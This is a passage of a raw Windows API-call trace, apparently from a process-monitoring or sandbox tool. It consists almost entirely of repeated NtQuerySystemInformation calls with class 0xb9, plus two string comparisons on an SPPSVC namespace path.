[0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0274.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.252] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.263] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0274.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 